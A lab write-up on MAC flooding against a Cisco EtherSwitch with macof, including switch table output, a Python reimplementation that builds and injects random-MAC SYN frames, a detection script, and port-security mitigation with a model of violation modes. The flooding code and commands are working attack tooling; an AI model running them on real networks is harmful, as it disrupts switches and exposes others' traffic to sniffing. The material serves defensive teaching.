network – cisco mac flood

macof (part of the dsniff suite) floods the local network with frames carrying random source and destination MAC addresses. A switch learns every source address it sees into its MAC (CAM) table; once that table is full it can no longer learn legitimate hosts, and frames addressed to any MAC it does not know are flooded out of every port. The switch therefore fails open and behaves like a hub ("repeating mode"), which lets the attacker sniff traffic that should only have been unicast to other ports.

root@bt:~# macof -i tap0

OPTIONS

-i interface     Specify the interface to send on.
-s src     Specify source IP address.
-d dst     Specify destination IP address.
-e tha     Specify target hardware address.
-x sport     Specify TCP source port.
-y dport     Specify TCP destination port.
-n times     Specify the number of packets to send.
Values for any options left unspecified will be generated randomly.

root@bt:~# macof -i tap0
96:51:2c:1c:c8:63 c:fe:b8:63:15:7 0.0.0.0.19081 > 0.0.0.0.64278: S 1230174330:1230174330(0) win 512
23:ae:fd:46:27:db e4:31:3:48:20:d5 0.0.0.0.60050 > 0.0.0.0.60848: S 112547810:112547810(0) win 512
ed:58:5:77:f3:18 4b:3f:4c:4e:23:4e 0.0.0.0.57838 > 0.0.0.0.12575: S 1632267000:1632267000(0) win 512
1f:a1:2d:24:6:3a c3:52:d0:66:12:a7 0.0.0.0.57635 > 0.0.0.0.35747: S 6820533:6820533(0) win 512
2e:ec:5b:63:3e:8 19:f8:fe:5:71:49 0.0.0.0.25686 > 0.0.0.0.18417: S 118449652:118449652(0) win 512
2b:90:9c:36:f6:3c a1:a8:3f:33:5f:d4 0.0.0.0.65280 > 0.0.0.0.27911: S 1304230507:1304230507(0) win 512
ca:a8:9:1a:76:d d:e6:3c:1f:66:fc 0.0.0.0.37998 > 0.0.0.0.5548: S 2144916016:2144916016(0) win 512
6d:26:2f:12:93:21 a9:31:21:7e:b5:36 0.0.0.0.13831 > 0.0.0.0.20315: S 291357629:291357629(0) win 512
41:e8:7:2a:e2:9b a2:31:5f:2e:29:ee 0.0.0.0.1331 > 0.0.0.0.61251: S 1679324170:1679324170(0) win 512
63:b:25:2f:f6:9a 51:60:7f:7a:d2:3f 0.0.0.0.34358 > 0.0.0.0.43979: S 1437028189:1437028189(0) win 512
4d:e7:a:6c:a1:dd ca:f8:8:1:22:83 0.0.0.0.4171 > 0.0.0.0.51805: S 680528803:680528803(0) win 512
df:13:8a:59:7c:46 58:b7:f0:49:6a:4d 0.0.0.0.47236 > 0.0.0.0.47576: S 607304860:607304860(0) win 512
e7:13:4c:73:57:1b 10:f4:8c:37:4:e2 0.0.0.0.29021 > 0.0.0.0.24928: S 1809351406:1809351406(0) win 512
16:5c:89:5d:1e:c2 6a:d4:99:1f:72:b3 0.0.0.0.38986 > 0.0.0.0.21900: S 1222511066:1222511066(0) win 512
53:86:9e:34:21:40 a2:29:57:69:3a:bc 0.0.0.0.11718 > 0.0.0.0.17937: S 65928585:65928585(0) win 512
a9:9d:e:39:ab:88 ff:9c:ed:c:56:2 0.0.0.0.50512 > 0.0.0.0.56332: S 1851553817:1851553817(0) win 512
8a:f3:e4:7e:16:20 56:8b:e0:6a:72:e6 0.0.0.0.28365 > 0.0.0.0.27603: S 1603809643:1603809643(0) win 512
ea:88:66:2f:f5:cb 44:58:63:29:4a:cb 0.0.0.0.37609 > 0.0.0.0.13814: S 1398309356:1398309356(0) win 512
cd:e2:be:61:fc:2b f0:6f:1c:2d:78:ee 0.0.0.0.62349 > 0.0.0.0.29602: S 1497598597:1497598597(0) win 512
96:70:24:37:38:d6 84:22:96:57:f1:1d 0.0.0.0.22888 > 0.0.0.0.43897: S 448110272:448110272(0) win 512
40:b1:bf:3b:c7:71 9e:f3:c3:42:a7:6e 0.0.0.0.64986 > 0.0.0.0.20475: S 2108880598:2108880598(0) win 512
ac:99:b0:4a:15:39 85:66:97:18:69:81 0.0.0.0.2341 > 0.0.0.0.39707: S 968976208:968976208(0) win 512
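To make the frame format behind those lines concrete, here is an added Python example (written for this page, not code from the original post or from dsniff) that builds the same kind of frame macof sends: Ethernet II, IPv4 and a 20-byte TCP SYN with window 512, random source and destination MACs, with the IP and TCP checksums computed, plus a one-line summary in the same layout as the macof output above. The 0.0.0.0 addresses are kept as defaults because that is what the run above printed; the seed values and the interface name passed to send_frames are assumptions, and sending needs root on a lab interface.

```python
import random
import socket
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
TCP_SYN = 0x02


def _checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_syn_frame(src_mac: bytes, dst_mac: bytes, src_ip: str, dst_ip: str,
                    sport: int, dport: int, seq: int, window: int = 512) -> bytes:
    """Ethernet II + IPv4 + 20-byte TCP SYN (54 bytes total), like the frames macof prints."""
    eth = dst_mac + src_mac + struct.pack("!H", ETHERTYPE_IPV4)
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    # IPv4: version/IHL, TOS, total length (20 IP + 20 TCP), ID, flags/frag, TTL, proto, csum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", _checksum(ip)) + ip[12:]
    # TCP: ports, seq, ack, data offset (5 words), flags, window, checksum, urgent pointer
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, TCP_SYN, window, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", _checksum(pseudo + tcp)) + tcp[18:]
    return eth + ip + tcp


def verify_checksums(frame: bytes) -> bool:
    """True when both the IP header checksum and the TCP checksum validate (sum to zero)."""
    ip, tcp = frame[14:34], frame[34:54]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, IPPROTO_TCP, len(tcp))
    return _checksum(ip) == 0 and _checksum(pseudo + tcp) == 0


def mac_str(mac: bytes) -> str:
    """Unpadded octets, the way the macof output above prints them (e.g. c:fe:b8:63:15:7)."""
    return ":".join("%x" % b for b in mac)


def summarize(frame: bytes) -> str:
    """One line per frame in the layout of the macof output: src MAC, dst MAC, then the flow."""
    dst, src, ip = frame[0:6], frame[6:12], frame[14:34]
    sport, dport, seq, _ack, _off, flags, window = struct.unpack("!HHIIBBH", frame[34:50])
    flag = "S" if flags & TCP_SYN else "."
    return "%s %s %s.%d > %s.%d: %s %d:%d(0) win %d" % (
        mac_str(src), mac_str(dst), socket.inet_ntoa(ip[12:16]), sport,
        socket.inet_ntoa(ip[16:20]), dport, flag, seq, seq, window)


def _random_mac(rng: random.Random) -> bytes:
    return bytes(rng.getrandbits(8) for _ in range(6))


def macof_frames(count: int, seed=None, src_ip="0.0.0.0", dst_ip="0.0.0.0"):
    """Yield frames with fresh random MACs, ports and sequence numbers; seed only for repeatable lab runs."""
    rng = random.Random(seed)
    for _ in range(count):
        yield build_syn_frame(_random_mac(rng), _random_mac(rng), src_ip, dst_ip,
                              rng.randrange(1024, 65536), rng.randrange(1024, 65536),
                              rng.getrandbits(31))


def send_frames(iface: str, count: int) -> int:
    """Inject the frames on a Linux interface (AF_PACKET raw socket; needs root, lab use only)."""
    sent = 0
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))  # iface is an assumed lab interface such as tap0
        for frame in macof_frames(count):
            s.send(frame)
            sent += 1
    return sent


if __name__ == "__main__":
    for f in macof_frames(5, seed=1):
        print(summarize(f))
```

Every frame is a valid TCP SYN, so a switch learns the random source MAC exactly as it would for a real host; the destination MAC is random too, so the frame is usually flooded rather than delivered, which is why the victim host never sees anything odd on its own NIC.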

Testing the MAC address flood against a Cisco C3640 router fitted with an NM-16ESW EtherSwitch module, used here to simulate a switch.

Configuration on the router that puts the attacking BackTrack 5 R1 host, connected to FastEthernet0/15, into VLAN 2 and gives the router an address on that VLAN:

interface FastEthernet0/15
switchport access vlan 2

!
interface Vlan2
ip address 192.168.1.2 255.255.255.0

All MAC addresses recorded on the switch before running macof (the two Self entries are the router's own VLAN interfaces; 2a37.0f82.f878 is the attacking host on FastEthernet0/15):

Router#sh mac-address-table
Destination Address  Address Type  VLAN  Destination Port
-------------------  ------------  ----  --------------------
cc05.3ee8.0000        Self          1        Vlan1
cc05.3ee8.0000        Self          2        Vlan2
2a37.0f82.f878        Dynamic          2        FastEthernet0/15

Router#

Only the dynamically learned addresses before macof:

Router#sh mac-address-table dynamic
Non-static Address Table:
Destination Address  Address Type  VLAN  Destination Port
-------------------  ------------  ----  --------------------
2a37.0f82.f878        Dynamic          2        FastEthernet0/15

Router#

The dynamically learned addresses after running macof. As you can see the table has been flooded with random addresses, every one of them learned on FastEthernet0/15, and the attacking host's original entry is no longer listed:

Router#sh mac-address-table dynamic
Non-static Address Table:
Destination Address  Address Type  VLAN  Destination Port
-------------------  ------------  ----  --------------------
5ee6.5f7d.ccf4        Dynamic          2        FastEthernet0/15
b2b0.dc64.650d        Dynamic          2        FastEthernet0/15
bab6.b235.3d91        Dynamic          2        FastEthernet0/15
9e20.d426.3f70        Dynamic          2        FastEthernet0/15
761b.077c.aad3        Dynamic          2        FastEthernet0/15
b8f3.f81a.c9b7        Dynamic          2        FastEthernet0/15
aaad.6b6e.d7da        Dynamic          2        FastEthernet0/15
c0a9.a10a.a94a        Dynamic          2        FastEthernet0/15
fe83.5900.d1ce        Dynamic          2        FastEthernet0/15
ea3c.f41c.cfea        Dynamic          2        FastEthernet0/15
98c0.a45f.045a        Dynamic          2        FastEthernet0/15
ae09.ae40.2e71        Dynamic          2        FastEthernet0/15
8c7a.c82c.b7c9        Dynamic          2        FastEthernet0/15
20cf.c067.5172        Dynamic          2        FastEthernet0/15
f8a1.0052.90fe        Dynamic          2        FastEthernet0/15
404e.5157.ead2        Dynamic          2        FastEthernet0/15
4414.811a.e796        Dynamic          2        FastEthernet0/15
a84e.1f1f.0ae9        Dynamic          2        FastEthernet0/15
a880.8e61.a76f        Dynamic          2        FastEthernet0/15
12f8.7272.6641        Dynamic          2        FastEthernet0/15
52fb.5633.f0b3        Dynamic          2        FastEthernet0/15
f6a5.0e2f.8bb7        Dynamic          2        FastEthernet0/15
8001.736a.301e        Dynamic          2        FastEthernet0/15
d692.681b.eed3        Dynamic          2        FastEthernet0/15
eafb.2046.5451        Dynamic          2        FastEthernet0/15
fad9.7e23.76cc        Dynamic          2        FastEthernet0/15
ac5a.c333.00e3        Dynamic          2        FastEthernet0/15
981b.ad4e.0d89        Dynamic          2        FastEthernet0/15
ee53.3b67.ef91        Dynamic          2        FastEthernet0/15
8e73.d310.e4b0        Dynamic          2        FastEthernet0/15
30dd.2d71.716c        Dynamic          2        FastEthernet0/15
8a2f.9c5e.ce33        Dynamic          2        FastEthernet0/15
0433.9a59.d5ed        Dynamic          2        FastEthernet0/15
06c4.cf15.47da        Dynamic          2        FastEthernet0/15
d806.ff17.4c3c        Dynamic          2        FastEthernet0/15
ccce.9014.e17d        Dynamic          2        FastEthernet0/15
3a3b.4d4e.5079        Dynamic          2        FastEthernet0/15
f848.b50f.9675        Dynamic          2        FastEthernet0/15
7658.cd1f.06de        Dynamic          2        FastEthernet0/15
845d.1b39.c7c2        Dynamic          2        FastEthernet0/15
c289.063a.a9ce        Dynamic          2        FastEthernet0/15
6869.301e.a975        Dynamic          2        FastEthernet0/15
a204.cb3c.b2cb        Dynamic          2        FastEthernet0/15
5e1a.df7a.6d18        Dynamic          2        FastEthernet0/15
acb1.fa6a.da0a        Dynamic          2        FastEthernet0/15
88dd.5e76.5f27        Dynamic          2        FastEthernet0/15
3048.8026.4f40        Dynamic          2        FastEthernet0/15
00f6.793c.4bf7        Dynamic          2        FastEthernet0/15
2e41.e730.fca2        Dynamic          2        FastEthernet0/15
0468.9230.0558        Dynamic          2        FastEthernet0/15
e0a7.c320.8e52        Dynamic          2        FastEthernet0/15
56ca.9875.300c        Dynamic          2        FastEthernet0/15
0877.d252.7ce8        Dynamic          2        FastEthernet0/15
6038.4c58.ee3b        Dynamic          2        FastEthernet0/15
1a22.6262.4702        Dynamic          2        FastEthernet0/15
44b7.bd6d.62d7        Dynamic          2        FastEthernet0/15
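Spotting this from the switch side is a matter of counting dynamic entries per port. Here is an added Python example (written for this page, not part of the original post) that parses `show mac-address-table dynamic` output, counts dynamically learned MACs per port, flags any port over a threshold, and diffs two polls of the table. The sample text is constructed from the page's "before" table and the first rows of its "after" table; the threshold of 5 is an assumption (an access port with a single host should normally hold one entry).

```python
import re
from collections import Counter

# One table row, e.g. "2a37.0f82.f878        Dynamic          2        FastEthernet0/15"
ROW = re.compile(r"^\s*([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+(\S+)\s+(\d+)\s+(\S+)\s*$", re.I)

# Constructed samples: the page's "before" output and the first rows of its "after" output.
BEFORE = """\
Non-static Address Table:
Destination Address  Address Type  VLAN  Destination Port
-------------------  ------------  ----  --------------------
2a37.0f82.f878        Dynamic          2        FastEthernet0/15
"""

AFTER = """\
Non-static Address Table:
Destination Address  Address Type  VLAN  Destination Port
-------------------  ------------  ----  --------------------
5ee6.5f7d.ccf4        Dynamic          2        FastEthernet0/15
b2b0.dc64.650d        Dynamic          2        FastEthernet0/15
bab6.b235.3d91        Dynamic          2        FastEthernet0/15
9e20.d426.3f70        Dynamic          2        FastEthernet0/15
761b.077c.aad3        Dynamic          2        FastEthernet0/15
b8f3.f81a.c9b7        Dynamic          2        FastEthernet0/15
aaad.6b6e.d7da        Dynamic          2        FastEthernet0/15
c0a9.a10a.a94a        Dynamic          2        FastEthernet0/15
"""


def parse_mac_table(text):
    """Return (mac, type, vlan, port) tuples from 'show mac-address-table [dynamic]' output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m.group(1).lower(), m.group(2), int(m.group(3)), m.group(4)))
    return rows


def dynamic_per_port(rows):
    """Count dynamically learned MACs per port; Self and Static entries are ignored."""
    return Counter(port for _mac, typ, _vlan, port in rows if typ.lower() == "dynamic")


def flag_ports(rows, threshold):
    """Ports holding more dynamic MACs than threshold; one host per access port is the norm."""
    return {port: n for port, n in dynamic_per_port(rows).items() if n > threshold}


def compare_snapshots(before_rows, after_rows):
    """MACs that appeared and MACs that vanished between two polls of the table."""
    before = {mac for mac, *_ in before_rows}
    after = {mac for mac, *_ in after_rows}
    return sorted(after - before), sorted(before - after)


if __name__ == "__main__":
    b, a = parse_mac_table(BEFORE), parse_mac_table(AFTER)
    print("dynamic MACs per port:", dict(dynamic_per_port(a)))
    print("ports over threshold:", flag_ports(a, threshold=5))
    new, gone = compare_snapshots(b, a)
    print("%d new MACs; vanished: %s" % (len(new), gone))
```

Run against the full table above it reports 56 dynamic entries on FastEthernet0/15. A sudden jump in the per-port count, or known hosts vanishing from the table while a single port fills up, is the signature to alert on; polling the table from a management script is cheap and works on gear that has no port-security support.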

The fix is to enable switchport port-security and limit the number of MAC addresses that can be learned on any one interface. The example below is on FastEthernet0/1; in the lab above it would go on FastEthernet0/15, the port the attacker is on, and in practice on every access port.

router# conf t
router(config)# interface fastethernet0/1
router(config-if)# switchport mode access
router(config-if)# switchport port-security
router(config-if)# switchport port-security maximum 10
router(config-if)# switchport port-security violation restrict
router(config-if)# switchport port-security mac-address aaaa.aaaa.aaaa
router(config-if)# switchport port-security mac-address bbbb.bbbb.bbbb

switchport mode access: port security can only be enabled on a port whose mode is set explicitly (access or trunk), not on a port in dynamic (DTP) mode, so define it as an access port first.
switchport port-security: enable port security on the interface.
switchport port-security maximum 10: sets the maximum number of secure MAC addresses for the interface to 10 (the default is 1). For a port with a single host, leave it at 1.
switchport port-security violation restrict: selects the "restrict" violation mode (the default is shutdown; the options are described below).
switchport port-security mac-address aaaa.aaaa.aaaa: defines a static secure MAC address. If you configure fewer secure MAC addresses than the maximum, the remaining ones are learned dynamically; add the `sticky` keyword to have dynamically learned addresses written into the running configuration so they survive a reload once saved.

switchport port-security violation options

protect: once the maximum is reached, drops frames with unknown source addresses until you remove enough
secure MAC addresses to drop below the maximum value. Nothing is counted or logged, so the flood is
contained but you are not told about it.

restrict: same drop behaviour as protect, but causes the SecurityViolation counter to increment and
sends a syslog message and SNMP trap, so the attempt is visible (this is the mode used above and the
one to prefer when the port must stay up).

shutdown: puts the interface into the error-disabled state immediately and sends an SNMP trap
notification. The port stays down until an administrator issues shutdown / no shutdown on it, or
errdisable recovery is configured for the psecure-violation cause. This is the default mode.
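To see why the per-port maximum stops the attack and how the three violation modes differ, here is an added Python model (written for this page, not the switch's real implementation) of a switch with a 64-entry MAC table and per-port port security. The port names, the table size, the 200 constructed attacker MACs and the host addresses are assumptions, and the model evicts the oldest entry when the table is full, standing in for the real behaviour where a full table simply refuses to learn and existing entries age out. Without port security the victim's entry is pushed out of the table and a frame addressed to it is flooded to every port, which is what lets the macof user sniff it; with `maximum 10` the attacker port only ever contributes ten entries, the victim stays in the table, and restrict and shutdown record the violations.

```python
from collections import OrderedDict

BROADCAST = "ff:ff:ff:ff:ff:ff"


class Port:
    def __init__(self, name, max_secure=None, violation="restrict"):
        self.name = name
        self.max_secure = max_secure      # None = port security not enabled
        self.violation = violation        # protect | restrict | shutdown
        self.secure = set()               # secure MACs learned on this port
        self.violations = 0               # the SecurityViolation counter
        self.err_disabled = False


class Switch:
    def __init__(self, cam_size, ports):
        self.cam_size = cam_size
        self.cam = OrderedDict()          # mac -> ingress port, oldest entry first
        self.ports = {p.name: p for p in ports}

    def _port_security_check(self, port, src_mac):
        """Return None if the frame may pass, otherwise the drop reason."""
        if port.max_secure is None or src_mac in port.secure:
            return None
        if len(port.secure) < port.max_secure:
            port.secure.add(src_mac)
            return None
        if port.violation == "protect":       # silent drop, nothing counted
            return "dropped:protect"
        port.violations += 1                  # restrict and shutdown both count (and would log/trap)
        if port.violation == "shutdown":
            port.err_disabled = True
            return "dropped:shutdown"
        return "dropped:restrict"

    def ingress(self, in_port, src_mac, dst_mac):
        port = self.ports[in_port]
        if port.err_disabled:
            return "dropped:err-disabled"
        reason = self._port_security_check(port, src_mac)
        if reason:
            return reason
        # Source learning. Simplification: a full table evicts its oldest entry; real switches
        # refuse to learn and let entries age out, which ends in the same flooded state.
        if src_mac in self.cam:
            self.cam.move_to_end(src_mac)
        elif len(self.cam) >= self.cam_size:
            self.cam.popitem(last=False)
        self.cam[src_mac] = in_port
        out = self.cam.get(dst_mac)
        if dst_mac == BROADCAST or out is None:
            return "flood"                    # unknown unicast goes out every port, attacker included
        return "forward:" + out


def run_demo(mode=None):
    """mode None = no port security; otherwise 'maximum 10' with the given violation mode."""
    ps = {} if mode is None else {"max_secure": 10, "violation": mode}
    sw = Switch(cam_size=64, ports=[Port("Fa0/1"), Port("Fa0/2"), Port("Fa0/15", **ps)])
    victim, host = "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02"        # constructed addresses
    sw.ingress("Fa0/1", victim, BROADCAST)                          # victim is learned on Fa0/1
    for i in range(200):                                            # macof-style flood on Fa0/15
        sw.ingress("Fa0/15", "02:00:00:00:%02x:%02x" % (i >> 8, i & 0xFF), BROADCAST)
    result = sw.ingress("Fa0/2", host, victim)                      # a third host sends to the victim
    attacker_port = sw.ports["Fa0/15"]
    return {"to_victim": result, "cam_entries": len(sw.cam),
            "violations": attacker_port.violations, "err_disabled": attacker_port.err_disabled}


if __name__ == "__main__":
    for mode in (None, "protect", "restrict", "shutdown"):
        print(mode or "no port-security", run_demo(mode))
```

The point the model makes is that the maximum is what actually defends the table; the violation mode only decides whether you hear about it (restrict) or whether the port goes down (shutdown), so restrict with syslog monitoring is usually the better trade-off on user ports.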
